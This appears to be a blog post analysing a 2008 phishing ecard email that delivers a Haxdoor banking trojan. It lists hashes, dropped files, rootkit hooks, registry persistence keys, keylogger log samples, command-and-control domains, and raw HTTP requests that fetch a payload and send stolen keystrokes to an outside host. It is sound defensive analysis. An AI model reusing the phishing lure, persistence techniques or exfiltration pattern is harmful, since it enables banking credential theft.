On 11 November 2008, I received an email indicating that I had received an ecard.
Date: Tue, 11 Nov 2008 19:29:36 +0000
From: "123greetings.com" (spoofed)
To: "my love" <.....@gmail.com>
Subject: You have received an eCard
Good day.
You have received an eCard
To pick up your eCard, choose from any of the following options:
Click on the following link (or copy & paste it into your web browser):
hxxp://zonzamas.info/ecard.exe
Your card will be aviailable for pick-up beginning for the next 30 days.
Please be sure to view your eCard before the days are up!
We hope you enjoy you eCard.
Thank You!
hxxp://www.123greetings.com
The email included a hyperlink for hxxp://zonzamas.info/ecard.exe. The file ecard.exe is a variant of the Haxdoor malcode family. The domain zonzamas.info is currently registered and hosted in the US (65.98.31.250).
ecard.exe
934fce496508b5dc4ba01f140870d01c
34,440 bytes
The malware ecard.exe creates the following files:
C:\WINDOWS\system32\gzipmod.dll
C:\WINDOWS\system32\vbagz.sys
gzipmod.dll
603ed7f0758bb2957aa94b3e7bd758b2
20,108 bytes
vbagz.sys
3aec76486842e41459e1edd79570b224
7,072 bytes
Both Haxdoor files install as rootkits hiding themselves from the Windows API.
>SSDT State
NtCreateProcess
Actual Address 0xF8B0CFE9
Hooked by: C:\WINDOWS\system32\vbagz.sys
NtCreateProcessEx
Actual Address 0xF8B0CA86
Hooked by: C:\WINDOWS\system32\vbagz.sys
NtOpenKey
Actual Address 0xF8B0C467
Hooked by: C:\WINDOWS\system32\vbagz.sys
NtOpenProcess
Actual Address 0xF8B0C799
Hooked by: C:\WINDOWS\system32\vbagz.sys
NtQueryDirectoryFile
Actual Address 0xF8B0C7EF
Hooked by: C:\WINDOWS\system32\vbagz.sys
>Files
Suspect File: C:\WINDOWS\system32\gzipmod.dll Status: Hidden
Suspect File: C:\WINDOWS\system32\vbagz.sys Status: Hidden
>Hooks
ntoskrnl.exe-->IoCreateFile, Type: Inline - RelativeJump at address 0x80583218 hook handler located in [vbagz.sys]
ntoskrnl.exe-->IoGetCurrentProcess, Type: Inline - RelativeJump at address 0x804EDE00 hook handler located in [vbagz.sys]
[1476]RootkitRevealer.exe-->wininet.dll-->InternetReadFile, Type: Inline - RelativeJump at address 0x7620FA3C hook handler located in [unknown_code_page]
[1476]RootkitRevealer.exe-->wininet.dll-->InternetReadFileExA, Type: Inline - RelativeJump at address 0x7622571D hook handler located in [unknown_code_page]
[1724]svchost.exe-->ntdll.dll-->LdrLoadDll, Type: Inline - RelativeJump at address 0x77F55669 hook handler located in [unknown_code_page]
[1724]svchost.exe-->wininet.dll-->HttpOpenRequestA, Type: Inline - RelativeJump at address 0x76206C0A hook handler located in [unknown_code_page]
[1724]svchost.exe-->wininet.dll-->HttpSendRequestA, Type: Inline - RelativeJump at address 0x76210689 hook handler located in [gzipmod.dll]
[1724]svchost.exe-->wininet.dll-->InternetCloseHandle, Type: Inline - RelativeJump at address 0x7620974B hook handler located in [unknown_code_page]
[1724]svchost.exe-->wininet.dll-->InternetConnectA, Type: Inline - RelativeJump at address 0x76205DE6 hook handler located in [unknown_code_page]
[1724]svchost.exe-->wininet.dll-->InternetOpenA, Type: Inline - RelativeJump at address 0x7621017D hook handler located in [unknown_code_page]
[1724]svchost.exe-->wininet.dll-->InternetQueryDataAvailable, Type: Inline - RelativeJump at address 0x7620FC5E hook handler located in [unknown_code_page]
[1724]svchost.exe-->wininet.dll-->InternetReadFile, Type: Inline - RelativeJump at address 0x7620FA3C hook handler located in [unknown_code_page]
[1724]svchost.exe-->wininet.dll-->InternetReadFileExA, Type: Inline - RelativeJump at address 0x7622571D hook handler located in [unknown_code_page]
!!POSSIBLE ROOTKIT ACTIVITY DETECTED!! =)
The malware gzipmod.dll creates:
C:\WINDOWS\System32\ answxt.bin
C:\WINDOWS\System32\k86.bin
K86.bin stores keylogger data. The following log shows examples of logon attempts at USBank and Wachovia.
00000159 00000159 0 ==================Google - Microsoft Internet Explorer ; MOD:C:\Program Files\Internet Explorer\iexplore.exe
000001C7 000001C7 0 usbank Enter 123456671988wachovia Enter 1234567 Tab pass123usbank Enter 12121212pass123456
The following registry keys are created to load gzipmod.dll at startup:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache
Persistent = 0x00000000
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\gzipmod
DllName = "gzipmod.dll"
Startup = "gzipmod"
Impersonate = 0x00000001
Asynchronous = 0x00000001
MaxWait = 0x00000001
adr9i = "[6B1ADFD9D971359EA]"
The following registry keys are created to load vbagz.sys during a safe-mode boot:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\vbagz.sys "(Default)"
Type: REG_SZ
Data: Driver
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vbagz.sys "(Default)"
Type: REG_SZ
Data: Driver
The following registry entries are set, affecting internet security:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List "C:\WINDOWS\System32\rundll32.exe"
Type: REG_SZ
Data: C:\WINDOWS\System32\rundll32.exe:*:Enabled:rundll32
The following registry entries install vbagz.sys as a service named “VBA2 PnP Driver”
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz "DisplayName"
Type: REG_SZ
Data: VBA2 PnP Driver
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz "ErrorControl"
Type: REG_DWORD
Data: 00, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz "ImagePath"
Type: REG_EXPAND_SZ
Data: system32\vbagz.sys
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz "Start"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz "Type"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz\Enum "0"
Type: REG_SZ
Data: Root\LEGACY_VBAGZ\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz\Enum "Count"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz\Enum "NextInstance"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz\Security "Security"
Type: REG_BINARY
Data: [hexadecimal values]
The malware connects to cash-babules.com/bolt2/data.php?trackid. The domain cash-babules.com is registered and hosted in Russia (62.167.16.11, SINGER-NET). The request returns instructions to download hxxp://sergej-grienko.com/inj/11-11.bin. The domain sergej-grienko.com is also registered and hosted in Russia (62.167.16.11, SINGER-NET). The 11-11.bin file is saved as C:\WINDOWS\System32\tremir.bin. The bin file stores instructions for creating fake banking institution logon html pages and keylogger triggers.
GET /ie-bolt2/data.php?trackid=[string] HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.xpsp.6043-201935)
Host: cash-babules.com Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Wed, 12 Nov 2008 03:52:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.6
CMND UU0 U4hxxp://sergej-grienko.com/inj/11-11.bin
U4sergej-grienko.com/inj/11-11.bin ED |END
GET /inj/11-11.bin HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.xpsp.6043-201935)
Host: sergej-grienko.com
Keylogger and harvested data is exfiltrated to cash-babules.com/ie-bolt2/data.php.
POST /ie-bolt2/data.php?dt=0&id=4569 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.xpsp.11731-201935)
Host: cash-babules.com
Content-Length: 725
Content-Type: multipart/form-data; boundary=---------------------------
Connection: Keep-Alive
Pragma: no-cache
Content-Disposition: form-data; name="user" [string]
Content-Disposition: form-data; name="info"
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment